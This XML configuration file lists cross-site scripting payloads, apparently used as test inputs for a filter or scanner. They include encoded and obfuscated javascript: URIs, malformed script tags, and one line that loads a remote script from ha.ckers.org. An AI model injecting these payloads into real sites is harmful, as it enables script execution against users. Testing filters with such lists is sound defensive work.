<config>
	<checks>
		<check><![CDATA[<script>alert(1);</script>]]></check>
		<check><![CDATA[<IMG SRC="javascript:alert('XSS');">]]></check>
		<check><![CDATA[<IMG SRC=javascript:alert('XSS')>]]></check>
		<check><![CDATA[<IMG SRC=JaVaScRiPt:alert('XSS')>]]></check>
		<check><![CDATA[<IMG SRC=javascript:alert(&quot;XSS&quot;)>]]></check>
		<check><![CDATA[<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>]]></check>
		<check><![CDATA[<IMG """><SCRIPT>alert("XSS")</SCRIPT>">]]></check>
		<check><![CDATA[<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>]]></check>
		<check><![CDATA[<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>]]></check>
		<check><![CDATA[<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>]]></check>
		<check><![CDATA[<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>]]></check>
		<check><![CDATA[<IMG SRC="jav	ascript:alert('XSS');">]]></check>
		<check><![CDATA[<IMG SRC="jav&#x09;ascript:alert('XSS');">]]></check>
		<check><![CDATA[<IMG SRC="jav&#x0A;ascript:alert('XSS');">]]></check>
		<check><![CDATA[<IMG SRC="jav&#x0D;ascript:alert('XSS');">]]></check>
		<check><![CDATA[<IMG SRC="jav&#x0D;ascript:alert('XSS');">]]></check>
		<check><![CDATA[<SCRIPT/XSS SRC="about:blank"></SCRIPT>]]></check>
		<check><![CDATA[<SCRIPT/XSS SRC="about:blank"></SCRIPT>]]></check>
		<check><![CDATA[<<SCRIPT>alert("XSS");//<</SCRIPT>]]></check>
		<check><![CDATA[<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>]]></check>
		<check><![CDATA[<IMG SRC="javascript:alert('XSS')"]]></check>
		<check><![CDATA[<SCRIPT>alert(/XSS/.source)</SCRIPT>]]></check>
		<check><![CDATA[<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">]]></check>
		<check><![CDATA[<IMG DYNSRC="javascript:alert('XSS')">]]></check>
		<check><![CDATA[<IMG LOWSRC="javascript:alert('XSS')">]]></check>
		<check><![CDATA[<BGSOUND SRC="javascript:alert('XSS');">]]></check>
		<check><![CDATA[<BR SIZE="&{alert('XSS')}">]]></check>
		<check><![CDATA[<LINK REL="stylesheet" HREF="javascript:alert('XSS');">]]></check>
	</checks>
</config>